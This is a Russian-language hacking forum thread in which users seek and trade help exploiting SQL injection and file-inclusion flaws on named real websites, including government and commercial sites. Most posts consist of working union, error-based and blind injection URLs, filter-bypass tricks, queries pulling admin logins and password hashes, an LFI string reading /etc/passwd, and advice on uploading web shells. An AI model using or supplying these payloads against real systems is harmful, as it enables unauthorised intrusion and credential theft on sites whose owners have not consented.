iframe.php


PHP:

";

echo"$file";

CloseTable();

include("footer.php");

}

?>





говорил же,

Konqi, спасибо. Я вчера таки спать лег ))

А можно еще вопрос? В посте #18193 Tigger пишет:


http://www.adlucem.info/?sadala=-15+/*!union*/+select+1,2,3,4,5,6,7,8,version%28%29--+


Слово union взято в комментарии, почему же оно выполняется? И правильно ли я понимаю, что на сайте стоит фильтр, не позволяющий выполнять "union select", а вот "/*!union*/ select" уже не подпадает под него?

=Zeus= said:
Konqi, спасибо. Я вчера таки спать лег ))
А можно еще вопрос? В посте #18193 Tigger пишет:
Слово union взято в комментарии, почему же оно выполняется? И правильно ли я понимаю, что на сайте стоит фильтр, не позволяющий выполнять "union select", а вот "/*!union*/ select" уже не подпадает под него?


http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf

OxoTnik said:
Добрый вечер всем.
вот как мы видим тут 2 базы
мне нужно залезть на mc-laren_oldforum, как это сделать?


select * from `mc-laren_oldforum`.table

alexvrn said:
как залить шелл и можно ли вообще залить его


Теоретически - можно.

Кинь ф-цию translit.

ggaffoltern[antigoogle].ch/index2.php?content=index&path=content&print=2

Опять же инклуд. Как организовать читалку?

---------


PHP:
http://imakefood[antiggole].com/?sw=1[sql-code]

WVS-ом насканил. Помогите раскрутить!

есть логи от mssql вида:

INSERT INTO таблица (.....) values (.....);

есть ли прога, в которую суешь эти логи, и она конвертит их в mysql ?

OxoTnik said:
Всем доброй ночи
есть такие таблички phoneName,phoneID
но при этом запросе выдает такую весчь
как вытащить таблицы?


/showpost.php?p=2850311&postcount=18201

Народ у вас было так нашел сайт в поисковике решил проверить на наличие XSS вбил


">alert()


и показывает


Warning: include() [function.include]: Couldn't connect to server in /var/www/search.kgn.ru/index.php on line 29
Warning: include(http:///?text=jfdshfds) [function.include]: failed to open stream: operation failed in /var/www/search.kgn.ru/index.php on line 29
Warning: include() [function.include]: Failed opening 'http:///?text=jfdshfds' for inclusion (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/search.kgn.ru/index.php on line 29

Demon_45 said:
Народ у вас было так нашел сайт в поисковике решил проверить на наличие XSS вбил
и показывает


http://search.kgn.ru/?text=ololo


Code:
Warning: include(http:///?text=ololo) [function.include]: failed to open stream: operation failed in /var/www/search.kgn.ru/index.php on line 29

А самому не додуматься что тут "не так"?

Просто в конфигах не прописано к какому хосту обращаться для осуществления поиска. Поиск там работает не на самом сайте а через сторонний сервис и там даже написано "Поиск осуществлен с использованием Яndex.Server.".

z0mbie86 said:
Помогите раскрутить http://217.8.80.55/?m[admin]&id=1'


Имхо, это не скуля.

Нужен админский доступ - заюзай XSS лучше


Code:
http://217.8.80.55/?m[search]&search_block_num=alert(/Its XSS, Baby/)

BigBear said:
Имхо, это не скуля.
Нужен админский доступ - заюзай XSS лучше
Там доступ в админку была но теперь сама админка удалена.

alexvrn said:
Можно ли раскрутит такую скулю id=1' ?

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY image_order LIMIT 2' at line 1

Помогите пожалуйста


Мне тока что с таким сообщением стукнули в аську, ДА МОЖНО, но прежде чем это сделать, нужно хотя бы пару статеек по скулям почитать и понять что к чему, скуля там очень простая:


_http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=1'


там фильтруются скобки, а вы навернека первым делом встевели что то типо version()

вообщем вот ваше начало:


http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=-1+union+select+1,2+--+


а дальше хоть немножко напрегите свои извилены!

z0mbie86 said:
Помогите раскрутить http://217.8.80.55/?m[admin]&id=1'




Code:
https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat( (select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'

version(): 5.0.67

Привет если есть кто умеет лить шелл отпишитесь в личку пожалуйста или аську в личку.

Доброго здравия форумчане!

В общем ищу где можно почитать про PostgreSQL

Нашёл такую скулю на сайте, а как попросить его показать мне пароль админа не знаю,

Помогите убедить сайт.

Leon2k

Можешь обратиться в личку, всё что знаю расскажу!

OxoTnik said:
Доброго здравия форумчане!
В общем ищу где можно почитать про
PostgreSQL


Проведение SQL-Injection в PostgreSQL (https://antichat.live/threads/35599/)

OxoTnik said:
такая проблема
Узнал таблицы, колонки, а в нужных колонках он не показывает нужную инфу
Как в этом случае его вытащить??
Ввёл точно все правильно!


Возможно, придётся поработать с выводом, чтото вроде


Code:
unhex(hex(%Visible_Col%)) или AES_DECRYPT(AES_ENCRYPT(%Visible_Col%,0x 71),0x71)

где %Visible_Col% - выводимая колонка в запросе

всё зависит от случая

OxoTnik said:
Только где про это почитать?


В любой статье по SQL-иньекциям.

/thread43966.html

/thread104591.html

insert into помогите с injection

запрос вида

log.php?ver=1.0.1.130'

Ошибка при занесении информации в базу.

118 ******/log.php

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25

INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }

все параметры строковые, можно как то вставить union+select?

Mr.aids said:
запрос вида
log.php?ver=1.0.1.130'
Ошибка при занесении информации в базу.
118 ******/log.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25
INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }
все параметры строковые, можно как то вставить union+select?


/showpost.php?p=2582303&postcount=16413

Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.

http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3&fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver=test9&msg=test10

и эта не работает

http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3&fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10

слепая скуль, что то делаю не так (перебираю a-z)

http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(sub string((SELECT%20os%20FROM%20log),1,1))

подскажите чего нибудь

Mr.aids said:
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3&fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver=test9&msg=test10
и эта не работает
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3&fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10
слепая скуль, что то делаю не так (перебираю a-z)
http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(sub string((SELECT%20os%20FROM%20log),1,1))
подскажите чего нибудь


1 - просто вывод того, что передали параметром.

2.

http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(vers ion(),1,1))>0,1,0))

меняешь >0 и подбираешь код символа. через char() можешь получить его значение.

Melfis said:
1 - просто вывод того, что передали параметром.
2.
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(vers ion(),1,1))>0,1,0))
меняешь >0 и подбираешь код символа. через char() можешь получить его значение.


кстати ascii не работает

http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(lower(subst r('1',1,1)))=31,1,0))

http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr(vers ion(),1,1))='5',1,0))

вот так фурычит

только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется

Mr.aids said:
только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется


что не так?


Code:
http://fvsn.org/download.php?id=(18296)and(1)=if(mid((select(versi on())),1,1)=5,1,0)

Code:
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((sel ect count(table_name) from information_schema.tables),1,1))=49,1,0))

Тут тоже не фильтруется.

такая ситуация:

обычная скуль..ничего не фильтруется, трудностей не возникло вообще до получения login;pass админа. Хочу получить шелл, НО:

1. Не могу найти панель администратора. Такое впечатление, что на самом сайте ее вообще нет.

2. Нет прав у текущего юзверя под которым работает БД на то чтобы залить шелл средствами с ку эль.

Есть какие еще варианты получения шелла?

Чтобы не быть голословным привожу линк

http://banksbattle.ru/333.php?archiv=-59+union+select+1,concat(login,0x20,password),3,4, 5,6+from+admins--

жду ваших предложений=)

Melfis said:

Code:
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((sel ect count(table_name) from information_schema.tables),1,1))=49,1,0))

Тут тоже не фильтруется.


блин у меня сейчас голова взарвётся. как так это работает.

ведь это не работает

http://fvsn.org/download.php?id=(18296)and%20ascii('1')=31

, а в ней ascii

я сейчас сума сойду, как в первом выражении ascii прошло, а в моём не проходит, объясните пожалуйста?

Mr.aids said:
блин у меня сейчас голова взарвётся. как так это работает.
ведь это не работает
http://fvsn.org/download.php?id=(18296)and%20ascii('1')=31
, а в ней ascii
я сейчас сума сойду, как в первом выражении ascii прошло, а в моём не проходит, объясните пожалуйста?


потому результат работы функции ascii('1')=49, а в условии у тебя ascii('1')=31, т.е. 49=31, т.к. 49 не равно 31 возвращается false и в ответ ничего не приходит!

Expl0ited said:
потому результат работы функции ascii('1')=49, а в условии у тебя ascii('1')=31, т.е. 49=31, т.к. 49 не равно 31 возвращается false и в ответ ничего не приходит!


блин сильно туплю. я то подставляю 31h=49=ascii('1')

Спасибо.

начал программулину писать которая выдернет имена столбцов. Возможно я лишную работу делаю. Может кто знает софтину какую нибудь для слепых SQL. Я тут нашёл BSQL Haker но она какая то ограниченая не подходит для данного случая

z0mbie86 said:

Code:
https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat( (select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'

Как мне обратиться к таблице mp_gw_auth в базе fontan?
При моей попытке вечно пишет Column count doesn't match value count at row 1 или Operand should contain 1 column(s) и др.


https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat( (select(id)/**/from/**/fontan.mp_gw_auth/**/limit/**/0,1),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'

Mr.aids said:
Может кто знает софтину какую нибудь для слепых SQL. Я тут нашёл BSQL Haker но она какая то ограниченая не подходит для данного случая


В Havij неплохго реализована работа с слепыми SQL. Описание есть на данном форуме вот в этой (http://www.forum.antichat.net/threadnav269084-1-10.html) теме.

удалось мне выдернуть структуру таблиц. логин и хеш пароль админа, но вот с расшифровкой проблема

root

cb4616f2ab30f37f6facf7e61036a5ec

пытаюсь проапдейтить запись на пароль 123, но похоже что то не так вписываю, если эта запись вообще возможна тут.

пароль получается так md5(md5(salt(pass))); судя по исходникам DataLive Engine.

salt='abchefghjkmnpqrstuvwxyz0123456789';


PHP:
$salt="abchefghjkmnpqrstuvwxyz0123456789";srand( ( double )microtime() *1000000); for($i=0;$iquery("UPDATE ".USERPREFIX."_users set password='".md5(md5($new_pass) ) ."', allowed_ip = '' WHERE user_id='$douser'");$db->query("DELETE FROM ".USERPREFIX."_lostdb WHERE lostname='$douser'");

http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr((UPD ATE%20dle_users%20set%20password='d9b1d7db4cd6e709 35368a1efb10e377',allowed_ip=''),1,1))='5',1,0))

Mr.aids,

1. нельзя делать апдейт в подзапросе.

2. md5(md5(salt(pass))) - не так, а md5(md5($pass . $salt)), где $salt = 9 random symbols from 'abchefghjkmnpqrstuvwxyz0123456789'.

3. Хз как в дле, но судя по коду, там должна быть отдельная колонка с солью в базе.

Melfis said:
Mr.aids,
1. нельзя делать апдейт в подзапросе.
2. md5(md5(salt(pass))) - не так, а md5(md5($pass . $salt)), где $salt = 9 random symbols from 'abchefghjkmnpqrstuvwxyz0123456789'.
3. Хз как в дле, но судя по коду, там должна быть отдельная колонка с солью в базе.


да я туплю опять жестоко. код который я привёл с md5 md5 salt это генерация нового пароля. а проверка и регистрация обычным способом идёт


PHP:
$user=$db->safesql(trim($user_arr[0] ) );$email=$db->safesql(trim($user_arr[1] ) );$pass=md5($user_arr[2] ); if(md5(sha1($user.$email.DBHOS T.DBNAME.$config['key'] ) ) !=$user_arr[3] ) die('ID not valid!'); if(pre g_match("/[\||\'|\|\[|\]|\"|\!|\?|\$|\@|\/|\\\|\&\~\*\{\+]/",$user) ) die('USER not valid!');$row=$db->super_query("SELECT * FROM ".USERPREFIX."_users WHERE name = '$user' AND password='$p ass'");

md5 без соли. А можно как то сделать запрос что бы сделать апдейт?

и не могу понять что с таблицей columns, судя по информации из tables таблица есть. Но все запросы терпят неудачу

http://fvsn.org/download.php?id=(18296)and%201=(if(ascii(substr((s elect%20column_name%20from%20information_schema.co lumns%20limit%206,1),2,1))=86,1,0))

перебираю все символы нет реакции

Mr.aids said:
и не могу понять что с таблицей columns, судя по информации из tables таблица есть. Но все запросы терпят неудачу
http://fvsn.org/download.php?id=(18296)and%201=(if(ascii(substr((s elect%20column_name%20from%20information_schema.co lumns%20limit%206,1),2,1))=86,1,0))
перебираю все символы нет реакции


С чего ты взял что второй символ запроса select column_name from information_schema.columns limit 6,1 равен букве V?

Настоятельно рекомендую тебе прочесть статью: /thread43966.html

И если в следующий раз думай прежде чем задать вопрос, иначе сообщение будет ликвидироваться.

OxoTnik said:
Всем светлым головам привет!
Столкнулся с такой проблемой
Есть сайт 4 мускул
Уверен что там есть эти колонки.
как вывести данные?


Для начала проверил бы, а есть ли вообще данные в этой таблице ??


Code:
http://www.teamarena.ru/demo/-9999999+or+ascii(substring((SELECT+count(*)+FROM+c up.user),1,1))=49 FALSE

http://www.teamarena.ru/demo/-9999999+or+ascii(substring((SELECT+count(*)+FROM+c up.user),1,1))=48 TRUE

В таблице cup.user 0 записей как видно.

Mr.aids said:
да я туплю опять жестоко. код который я привёл с md5 md5 salt это генерация нового пароля. а проверка и регистрация обычным способом идёт

PHP:
$user=$db->safesql(trim($user_arr[0] ) );$email=$db->safesql(trim($user_arr[1] ) );$pass=md5($user_arr[2] ); if(md5(sha1($user.$email.DBHOS T.DBNAME.$config['key'] ) ) !=$user_arr[3] ) die('ID not valid!'); if(pre g_match("/[\||\'|\|\[|\]|\"|\!|\?|\$|\@|\/|\\\|\&\~\*\{\+]/",$user) ) die('USER not valid!');$row=$db->super_query("SELECT * FROM ".USERPREFIX."_users WHERE name = '$user' AND password='$p ass'");

md5 без соли. А можно как то сделать запрос что бы сделать апдейт?


Никак ты апдейт не сделаешь в твоем случае! В MSSQL получилось бы. Лучше выдерни хэш и соль, и кинь в соответствующею темку расшифровки хешей.

всем привет.

я пока что новичок в sql уязвимостях, так вот никак не получается вывести столбцы из таблицы users


Code:
http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name=' users'+--+

хотя он и из любой таблицы не выводит...

Заранее спасибо.

smirk said:
всем привет.
я пока что новичок в sql уязвимостях, так вот никак не получается вывести столбцы из таблицы users

Code:
http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name=' users'+--+

хотя он и из любой таблицы не выводит...
Заранее спасибо.


для того чтобы вывести столбцы, переведи users в хекс,

тоисть так должно работать


Code:
http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name=0 x7573657273+--+

0х7573... без пробела!!!

pirat0 said:
для того чтобы вывести столбцы, переведи users в хекс,
тоисть так должно работать

Code:
http://versos.ru/allautors/verso.html?id=-27+union+select+1,2,column_name,4,5+ from+information_schema.columns+where+table_name=0 x7573657273+--+

0х7573... без пробела!!!


хах точно, обычно просто users и т.д. буду знать.

Спасибо.

чем отличаеться функция include от функции require

к примеру есть ли тут уязвимость

хотя бы LFI с учетом того что PHP версии 5.3


PHP:
functionincluded()

{

$config=$GLOBALS['part']['included'];

require(PATH.'/lib/temp/'.strtolower($conf['part']['included']) .'.php');

}

ysmat said:
чем отличаеться функция include от функции require
к примеру есть ли тут уязвимость
хотя бы LFI с учетом того что PHP версии 5.3

PHP:
functionincluded()

{

$config=$GLOBALS['part']['included'];

require(PATH.'/lib/temp/'.strtolower($conf['part']['included']) .'.php');

}





отличаются тем что, после того как функция require возвращает логический false скрипт останавливает работу фатально, а если include возвращает false то скрипт продолжает работу

грубо говоря, если подключаемый файл не найден или путь не верно то require завершит работу скрипта, а в случий include скрипт продолжает работу

в твоем примере инклуда нету

а почему нету $conf на самом деле $config это просто

моя опечатка

другое дело я не знаю как отсечь разширение .php

в 5.3 версии

ведь не нуль байт ни не его замена с большим количеством на слешей не работают

Ребята кто шарит в скулях, подскажите плиз как сформировать правильно строку запроса


Error SQL !SELECT * FROM adclass WHERE active='on' ORDER BY updates DESC LIMIT -10, 10
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1

AKYLA said:
Ребята кто шарит в скулях, подскажите плиз как сформировать правильно строку запроса


SELECT * FROM adclass WHERE active='on' ORDER BY updates DESC LIMIT 10, 10

AKYLA said:
Ребята кто шарит в скулях, подскажите плиз как сформировать правильно строку запроса


Или как раскрутить? Раскрутить можно если только возможно чтение и запись файлов, а вместо -10, как я понял вы можете подставить любое слово. Злонамеренный код можно использовать как разделитель.

помогите расскрутить


Code:
http://www.watchfashion.ru/search/

в поле поиск в Post запросе ошибка

Faaax said:
помогите расскрутить

Code:
http://www.watchfashion.ru/search/

в поле поиск в Post запросе ошибка


В строке поиска:


Code:
') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)fro m(information_schema.columns)where(table_schema!=0 x696e666f726d6174696f6e5f736368656d61)and(0x00)in( @x:=concat(@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name))))x),4,5,6,7,8,9,10#

Expl0ited said:
В строке поиска:

Code:
') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)fro m(information_schema.columns)where(table_schema!=0 x696e666f726d6174696f6e5f736368656d61)and(0x00)in( @x:=concat(@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name))))x),4,5,6,7,8,9,10#



не пойму почему дальше не выводится?!?!?


Code:
') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)fro m(information_schema.columns)where(table_name!=0x6 1646d696e5f7573657273)and(0x00)in(@x:=concat(@x,0x 3c62723e,id,0x2e,login,0x3a,passwd))))x),4,5,6,7,8 ,9,10#

Faaax said:
не пойму почему дальше не выводится?!?!?

Code:
') and false union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)fro m(information_schema.columns)where(table_name!=0x6 1646d696e5f7573657273)and(0x00)in(@x:=concat(@x,0x 3c62723e,id,0x2e,login,0x3a,passwd))))x),4,5,6,7,8 ,9,10#



Потому что необходимо знать базовый синтаксис SQL запросов.

Codeblo said:
Я начал только изучать, не хочу по шаблону все делать, детально пару вопросов возникло:
1-ый вопрос, и т.д будет пронумеровано.
-------------------
site.com/index.php?id=
1+and+1=1
(Выводит страницу 1)
site.com/index.php?id=
1+and+1=2
(Выводит ошибку, или ничего не выводит, вобщем отличается от первого)
Итак: почему
1+and+1=1
-хотя тут должно было бы выдать ошибку так как дословно 1+и+1=2(но не один)
А когда запрос идет правильный:
1+and+1=2
дословно 1+и+1=2 -то выдает Ошибку- это из Фаг'а Джокера.
2. “
--
“это знак начала комментария - при расскрутки скули Вопросы:
2/1 Всегда ли нужно ставить в конце запроса "
--
"
2/2 В каких случаях Ставить
--
или
--+
или
+--
-по счет него -вопрос бывает ли такой? или
+--+
2/3 - имеется в виду допустим конец уже скули limit+23,1 --
Вопрос в том может ли из за пробелов -выдать ошибку - и стоит ли ставить проблемы вообще?
Пока все, спасибо за помощь.


AND это не операция сложения, это просто операция объединения выражений. Таким образом

1 and 1=1 означает выражение "если 1 истина И 1 РАВНО 1, то и все выражение истинно." Следовательно, выражение

1 and 1=2 означает "если 1 истина И 1 РАВНО 2, то выражение истинно", но т.к. 1 не равно 2, то все выражение ложно.

комментарий с пробелом ставится при многострочных запросах.

попугай said:
AND это не операция сложения, это просто операция объединения выражений. Таким образом
1 and 1=1 означает выражение "если 1 истина И 1 РАВНО 1, то и все выражение истинно." Следовательно, выражение
1 and 1=2 означает "если 1 истина И 1 РАВНО 2, то выражение истинно", но т.к. 1 не равно 2, то все выражение ложно.
комментарий с пробелом ставится при многострочных запросах.


Не только при многострочных запросах, но и если переменная, в которую мы инжектим имеет тип string. В этом случае комментарий ставится для отсечения лишней кавычки (')

Codeblo said:
2. “
--
“это знак начала комментария - при расскрутки скули Вопросы:
2/1 Всегда ли нужно ставить в конце запроса "
--
"
2/2 В каких случаях Ставить
--
или
--+
или
+--
-по счет него -вопрос бывает ли такой? или
+--+
2/3 - имеется в виду допустим конец уже скули limit+23,1 --
Вопрос в том может ли из за пробелов -выдать ошибку - и стоит ли ставить пробелы вообще?
Пока все, спасибо за помощь.


2.1 Нет, не всегда, только когда запрос многострочный (солидарен с Попугаем).

Как варианты, можно обрезать запросы либо нулл-байтом (%00), или знаками комментариев (/* или -- или # в зависимости от версий).

2.2 -- Ставится для обрезания дополнительной части основного запроса.

+ в этом случае играет роль пробела, то есть комментарий вида+--+ эквивалентен/**/--/**/.

Также вместо плюса можно использовать или пробел, или комментарий /**/ или знак табуляции %09 или скобки (0)union(select(1)). Всё зависит от конкретного случая. Точнее от используемой фильтрации.

Опять же зачастую бывает, что обрезать комментарием мало, поэтому в конце запроса вместо +--+ ставят +--+1

Одним словом, нужно экспериментировать на практике.

h00lyshit! said:
Это что за случаи такие? 0-day?


Самый простой, взятый из практики


Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),3 ,4,5,6,7,8)--+ FALSE

http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),3 ,4,5,6,7,8)--+1 TRUE

Обнаружение SQL-инъекции = не всегда подстановка кавычек. Проверяется подзапросами


Code:
id=1+and+1=1
id=1+and+1=2

Разный результат говорит о наличии инъекций...

Опять же, способов выявления SQL-инъекций множество.

Боже мой, да что я тут распинаюсь, Уважаемый, почитайте мануалы про простейшим инъекциям, азы вам объяснять?? Тут ни у кого нет ни времени, ни желания. Помощь - другое дело.

есть html файл с куском таблицы из wso.

тоесть тупо кусок вида


Code:
1 столбик / 2 столбик / 3 столбик / 4 столбик/
данные / данные / данные / данные /

в исходнике, всё это отображается вот так


Code:
1 столбик2 столбик3 столбик4 столбикданныеданныеданные данные


мб кто обьяснит, или поможет как спарсить этот кусок до вида


Code:
1 столбик/ 2 столбик
данные / данные

Nightmarе said:
GroM88: шелл через восстановление базы данных льётся в phpBB 2, в phpBB 3 другой способ, правка шаблонов\темплейтов, но они должны быть доступны на запись.
И да, там могут стоять фильтры на выполнение php кода...


а можно поподробнее?а то уже минут 40 лазию по админке не могу никак залить

Может кто-нибудь помощь с HTTP Verb Tampering. Я отправляю PUT, DELETE, OPTIONS и т.д. Но какая польза? Можно ли проникнуть в сайт? Спасибо.

P.S. В гугле копал, ничего не нашел про эксплуатацию(кроме обхода VBAAC, Гольцева..)

Подскажите как узнать таблицы с колонками в MySQL 4.0.x ? всю ночь парился и не фига,просто сайт банка нашел с sql

immortal_Ale said:
Подскажите как узнать таблицы с колонками в MySQL 4.0.x ? всю ночь парился и не фига,просто сайт банка нашел с sql


Колонки можно узнать, если есть вывод об ошибках, и есть имя таблицы у которой нужно узнать колонки. А таблицы никак не узнать, только брутом. Проверить, есть ли права на счему mysql, потом file_priv. Если есть права, то можно будет через into outfile попробовать залить, а если file_priv=N то можно будет хэши mysql юзеров вытащить и потом попытаться phpMyAdmin найти, чтобы авторизоваться


Kuteke said:
Может кто-нибудь помощь с HTTP Verb Tampering. Я отправляю PUT, DELETE, OPTIONS и т.д. Но какая польза? Можно ли проникнуть в сайт? Спасибо.
P.S. В гугле копал, ничего не нашел про эксплуатацию(кроме обхода VBAAC, Гольцева..)


Как я знаю, PUT, DELETE, OPTIONS ничего полезного не дадут. Иногда бывает в .htaccess т.е. Post запросы будут проходить.

http://ts.cityvibe[nogoogle].com/escorts.php?country=1[inj]&do=cityview

ORA-xxxx пишет. Значит Oracle? Раскрутите пожалуйста.

Вопрос по phpmyadmin: Есть уязвимый для LFI сайт _www.someurl.com/phpmyadmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00

Долго пытался найти логи apach, но так и не смог, proc/self/environ тоже не доступен для чтения. Есть ли какие-нибудь другие способы залить шелл?

есть такой вопрос

http://xchats.ru/forum/xf.php?s=0&ci=1&id=0&pass=&mod=show&rid=1&page=0%27

смогу ли я влепить сюда свой запрос если уязвимый гет параметр передаётся в лимит? если да то как?

qaz said:
есть такой вопрос
http://xchats.ru/forum/xf.php?s=0&ci=1&id=0&pass=&mod=show&rid=1&page=0%27
смогу ли я влепить сюда свой запрос если уязвимый гет параметр передаётся в лимит? если да то как?


Там нет инъекции.

Просто кривые руки.

В коде бы выглядело как-то так:


PHP:
"... LIMIT ". (($_GET['page']-1)*10) .", 10 .. "

Вот крутил как слепую, никак до ума довести не могу как выдрать логины.

Мож у Вас что получится ?


Code:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41+and+(select+count(user_name)+ from+stories)=18+and+1=1


Забыл сказать, то что выше - это MsAccess

Всем привет, дайте подсказку с Smf форумом, нету прав на запись в папку тем, как залить шелл?

BigBear said:
Вот крутил как слепую, никак до ума довести не могу как выдрать логины.
Мож у Вас что получится ?

Code:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41+and+(select+count(user_name)+ from+stories)=18+and+1=1

Забыл сказать, то что выше - это
MsAccess


http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)and(1=2)union(select(1),(2),( 3),(4),(5),(6),(7),(8),(9),(10),(11),(12)from(stor ies)

Boolean said:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)and(1=2)union(select(1),(2),( 3),(4),(5),(6),(7),(8),(9),(10),(11),(12)from(stor ies)


Как ты подобрал количество полей здесь, объясни если не трудно?

er9j6@ said:
Как ты подобрал количество полей здесь, объясни если не трудно?




Code:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(10
Нет ошибки.

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(20
Есть ошибка.

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(15
Есть ошибка.

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(13
Есть ошибка.

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(12
Нет ошибки.

хм..

а как такое обойти?

http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+

Добрый вечер. Интересует, что можно сделать с этим сайтом. Проблема в том что я нашел лишь одну php-страничку. Даже кавычку подставить некуда. Не понятно так же, что за движок (походу самописный). Сканил структуру сайта меднет-сканнером - тоже ничего интересного.


http://marafet.net/include/ajax/modules/gallery/voteImage.php


Все что я смог это получить раскрытие путей, подпортив кукисы.


Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/gambler/data/www/marafet.net/classes/modules/sys_session/Session.class.php on line 53


Буду благодарен за любую инфу, которая может помочь.

smirk said:
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+


Можно побаловаться с IF(), но нормально ничего не вытащишь.

http://www.soldatru.ru/read.php?id=IF((SUBSTR(version(),1,1)='5'),1410,-1410)

Если правильно - покажет страницу, нет - не покажет.

регулярка на select, пробовал SeLeCT и т.п. вариации с регистром букв, не помогает.

smirk said:
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+


Так, но вывода все равно нет

http://www.soldatru.ru/read.php?id=-1410+%75%6e%69%6f%6e%0a%73%65%6c%65%63%74+1,2,3,4, 5,6,7,8,9,10,11,12,13,14+--+

В прочем, там и в поиске уязвимость вида SQL INJ.

Пробелы стр_реплейсятся на %, видимо для "улучшения" результатов поиска.

Вместо пробела юзать /**/

В поиск:

http://www.soldatru.ru/search.php

'/**/and/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version ()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28/**/#

smirk said:
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+


это вбей в search.php

